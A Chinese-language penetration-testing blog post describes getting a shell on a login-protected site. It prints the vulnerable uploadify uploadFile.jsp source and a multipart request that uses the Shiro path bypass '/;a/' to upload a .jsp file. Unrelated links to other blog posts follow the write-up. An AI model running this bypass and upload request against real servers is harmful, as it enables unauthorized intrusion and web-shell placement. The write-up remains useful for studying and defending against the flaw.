0x01 Shiro反序列化命令执行?

日常挖洞,burpsuite插件shiro告警

用ShiroExploit的dnslog方式和静态文件回显方式都没检测出来。tomcat的回显也是不行。

0x02 任意文件上传?

这个站打开是个登录框

抓包,发现验证码无效,爆破一顿以后没爆出来。注意到

这个框架叫某admin框架,谷歌查了一下这个框架有什么洞,发现一篇帖子。

说存在此文件plugins/uploadify/uploadFile.jsp 且此文件存在任意文件上传

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %>

<%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %>

<%!

	public void upload(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {

		String savePath = this.getServletConfig().getServletContext().getRealPath("");

		savePath = savePath + request.getParameter("uploadPath");

		File f1 = new File(savePath);

		//这里接收了uploadPath的值  System.out.println(request.getParameter("uploadPath"));

		if (!f1.exists()) {

			f1.mkdirs();

		}

		DiskFileItemFactory fac = new DiskFileItemFactory();

		ServletFileUpload upload = new ServletFileUpload(fac);

		upload.setHeaderEncoding("utf-8");

		List fileList = null;

		try {

			fileList = upload.parseRequest(request);

		} catch (FileUploadException ex) {

			return;

		}

		String fileNmae = request.getParameter("fileNmae");

		Iterator<FileItem> it = fileList.iterator();

		String name = "";

		String extName = "";

		while (it.hasNext()) {

			FileItem item = it.next();

			if (!item.isFormField()) {

				name = item.getName();

				long size = item.getSize();

				String type = item.getContentType();

				//System.out.println(size + " " + type);

				if (name == null || name.trim().equals("")) {

					continue;

				}

				// 扩展名格式:

				if (name.lastIndexOf(".") >= 0) {

					extName = name.substring(name.lastIndexOf("."));

				}

				File file = null;

				if(null != fileNmae && !"".equals(fileNmae)){

					file = new File(savePath + fileNmae);

				}else{

					do {

						if(null != fileNmae && !"".equals(fileNmae)){

							file = new File(savePath + fileNmae);

						}else{

							name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date());	//获取当前日期

							name = name + (int)(Math.random()*90000+10000);

							file = new File(savePath + name + extName);

						}

					} while (file.exists());

				}

				File saveFile = new File(savePath + name + extName);

				try {

					item.write(saveFile);

				} catch (Exception e) {

					e.printStackTrace();

				}

			}

		}

		response.getWriter().print((name.trim() + extName.trim()).trim());

	}

%>

<%

	upload(request, response);

%>

尝试访问此文件,提示未登录302跳转

想到这个站用了shiro虽然反序列化命令执行修了,但是最近暴的一个shiro权限绕过肯定来不及修。具体可以看这篇文章:https://mp.weixin.qq.com/s/yb6Tb7zSTKKmBlcNVz0MBA

我们使用

/;a/plugins/uploadify/uploadFile.jsp

来绕过shiro的权限控制,可以注意到状态码为200

结合之前给出的代码需要两个参数构造上传包

发现上传成功,但是居然找不到文件。

仔细看了一下才知道request.getParameter("uploadPath");解析不了multipart里的参数,再次构造上传包

POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ

------WebKitFormBoundaryQDeBiVqfe6p3FMnJ

Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp"

Content-Type: image/jpeg

test

------WebKitFormBoundaryQDeBiVqfe6p3FMnJ--

成功shell

那些年拿过的shell之shiro权限绕过的更多相关文章

  1. SpringMVC下的Shiro权限框架的使用

    SpringMVC+Shiro权限管理 博文目录 权限的简单描述 实例表结构及内容及POJO Shiro-pom.xml Shiro-web.xml Shiro-MyShiro-权限认证,登录认证层 ...

  2. 十、 Spring Boot Shiro 权限管理

    使用Shiro之前用在spring MVC中,是通过XML文件进行配置. 将Shiro应用到Spring Boot中,本地已经完成了SpringBoot使用Shiro的实例,将配置方法共享一下. 先简 ...

  3. SpringMVC整合Shiro权限框架

    尊重原创:http://blog.csdn.net/donggua3694857/article/details/52157313 最近在学习Shiro,首先非常感谢开涛大神的<跟我学Shiro ...

  4. shiro权限框架(一)

    不知不觉接触shiro安全框架都快三个月了,这中间配合项目开发踩过无数的坑.现在回想总结下,也算是一种积累,一种分享.中间有不够完美的地方或者不好的地方,希望大家指出来能一起交流.在这里谢谢开涛老师的 ...

  5. Shiro入门之一 -------- Shiro权限认证与授权

    一  将Shirojar包导入web项目 二 在web.xml中配置shiro代理过滤器 注意: 该过滤器需要配置在struts2过滤器之前 <!-- 配置Shiro的代理过滤器 -->  ...

  6. 类Shiro权限校验框架的设计和实现(2)--对复杂权限表达式的支持

    前言: 我看了下shiro好像默认不支持复杂表达式的权限校验, 它需要开发者自己去做些功能扩展的工作. 针对这个问题, 同时也会为了弥补上一篇文章提到的支持复杂表示需求, 特地尝试写一下解决方法. 本 ...

  7. Spring Boot Shiro 权限管理 【转】

    http://blog.csdn.net/catoop/article/details/50520958 主要用于备忘 本来是打算接着写关于数据库方面,集成MyBatis的,刚好赶上朋友问到Shiro ...

  8. shiro权限管理的框架-入门

    shiro权限管理的框架 1.权限管理的概念 基本上涉及到用户参与的系统都要进行权限管理,权限管理属于系统安全的范畴,权限管理实现对用户访问系统的控制,按照安全规则或者安全策略控制用户可以访问而且只能 ...

  9. Shiro 权限标签

    Shiro 权限标签: 导入标签库: <%@taglib prefix="shiro" uri="http://shiro.apache.org/tags" ...

  10. Shiro 权限注解

      Shiro 权限注解:   Shiro 提供了相应的注解用于权限控制,如果使用这些注解就需要使用AOP 的功能来进行 判断,如Spring AOP:Shiro 提供了Spring AOP 集成用于 ...

随机推荐

  1. 在Unity中实现(纯C#)热更新--使用ILRunTime{学习日志}

    热更新的逻辑:热更新的那部分内容其实就是一个dll的库文件,到时候修改也是改这个库文件: 我们只需要在主工程(我们的Unity项目)中引入并调用这个dll库里的代码就行了. 首先我们需要在Unity中 ...

  2. eolinker脚本代码[Javascript]:通过判断返回码决定是否中止执行脚本

    场景描述: 请求返回码(code)不等于0时,整个脚本停止执行,并抛出信息 具体脚本: if (JSON.parse(result_api_1.response).Code != "0&qu ...

  3. vue报错:Property or method "xxx" is not defined on the instance but referenced during render.

    vue报错:Property or method "attendanceDetaill" is not defined on the instance but referenced ...

  4. Bagging、Boosting、Stacking的原理

      Bagging.Boosting.Stacking是常见集成学习的形式,它们都是通过对多个学习器进行有机组合,达到比单个学习器性能更好的目标. 一.Bagging 1.算法概述   Bagging ...

  5. AD系列:Windows Server 2025 搭建AD域控和初始化

    简介 本教程主要内容为使用Windows Server 2025 部署Active Directory (ADDS\域控制器)服务. 所有操作尽量使用PowerShell,可提高部署效率和自动化操作. ...

  6. mysql服务未启动报错2003-Can't connect to MySQL server on 'localhost' (10061 "Unknown error")

    解决方法:开启mysql服务再试试 管理员身份运行cmd 开启mysql服务net start mysql 关闭mysql服务 net stop mysql

  7. XGBooost算法原理及Python实现

    一.概述   XGBoost 是一种基于梯度提升框架的机器学习算法,它通过迭代地训练一系列决策树来构建模型.核心思想是通过不断地在已有模型的基础上,拟合负梯度方向的残差(真实值与预测值的差)来构建新的 ...

  8. 鸿蒙Next开发实战教程:实现抖音长按快速评论特效

    开篇点题,今天玩点花的. 不知道大家有没有发现,抖音上的评论键长按会弹出一排表情框用于快速评论,不过现在鸿蒙原生版的抖音还没有这个功能,今天幽蓝君就小试牛刀,在鸿蒙上做一下这个功能,也是应一位友友的私 ...

  9. TVM:解析TVM算子

    在对TVM:编译流程一文中,从ONNX模型中读取模型并转换为relay IR,其中调用_convert_operator函数关于将onnx算子转换成Relay算子,其中如何实现当时直接跳过去了,本节将 ...

  10. odoo里固定form表单上的header

    固定form表头header实现方式   修改全局样式:加个position: fixed;  即可 .o_form_view .o_form_statusbar { position: fixed; ...